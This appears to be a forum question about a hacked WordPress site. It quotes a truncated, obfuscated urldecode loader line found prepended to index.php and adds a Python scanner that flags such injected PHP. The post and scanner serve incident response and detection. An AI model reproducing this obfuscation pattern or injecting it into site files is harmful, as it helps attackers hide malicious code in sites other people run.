permissions – Corrupted index.php file in root and wp-admin

Question

I’m managing a couple of WordPress sites for a client. Suddenly one of the sites stopped working and was throwing a 500 error (Unable to handle the request). Since index.php would be the first file that gets executed, I happened to open the file to take a look and found the following encoded text appended to the index.php file under root and also within wp-admin.

$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54>

Full file:

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54>
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

All the files have 644 and folders have 755 permissions. The complete website is hosted in AWS and we have a WAF which has the PHP and WordPress default rules. I’m interested in figuring out ways to see how the penetration happens and how the index.php is being amended.

fuxia 2 months 2021-09-25T09:13:29-05:00 0 Answers 0 views 0
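
A defensive check for the pattern shown in the question, as an added example that is not part of the original post: it flags PHP files that carry a variable name made only of `O`, `0` and `_`, a `urldecode()` call on a long percent-encoded literal, or such code in its own block ahead of the file's real `<?php` tag. The function names, thresholds and sample strings are assumptions constructed for illustration.

```python
from __future__ import annotations
import re
from pathlib import Path

# Variable names made only of O, 0 and _ (like $OO0__00_OO in the post).
OBFUSCATED_VAR = re.compile(r"\$[O0_]{6,}\b")
# urldecode() called on a long run of %xx escapes (threshold is an assumption).
ENCODED_ARG = re.compile(r"urldecode\(\s*[\"'](?:%[0-9a-fA-F]{2}){16,}")
# A complete <?php ... ?> block sitting in front of the file's real <?php tag.
LEADING_BLOCK = re.compile(r"\A\s*<\?php\b(.*?)\?>\s*<\?php\b", re.S)


def inspect_php(source: str) -> list[str]:
    """Return the names of the indicators present in one PHP source string."""
    findings = []
    if OBFUSCATED_VAR.search(source):
        findings.append("obfuscated-variable")
    if ENCODED_ARG.search(source):
        findings.append("urldecode-percent-blob")
    lead = LEADING_BLOCK.match(source)
    # Report the leading block only when it carries one of the markers above;
    # templates legitimately open and close PHP tags many times.
    if lead and (OBFUSCATED_VAR.search(lead.group(1))
                 or ENCODED_ARG.search(lead.group(1))):
        findings.append("prepended-block")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Inspect every .php file under root; map relative path -> findings."""
    base = Path(root)
    results = {}
    for path in sorted(base.rglob("*.php")):
        hits = inspect_php(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[path.relative_to(base).as_posix()] = hits
    return results


# Constructed samples (not the payload from the post).
_BLOB = "".join(f"%{b:02x}" for b in b"constructed-sample-alphabet")
CLEAN = ("<?php\ndefine( 'WP_USE_THEMES', true );\n"
         "require __DIR__ . '/wp-blog-header.php';\n")
INFECTED = f'<?php\n$O0O__0O_0O=urldecode("{_BLOB}");\n?>\n' + CLEAN

if __name__ == "__main__":
    print(inspect_php(INFECTED))  # all three indicators
    print(inspect_php(CLEAN))     # no indicators
```

A hit shows which files were altered; it does not show how the write happened.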
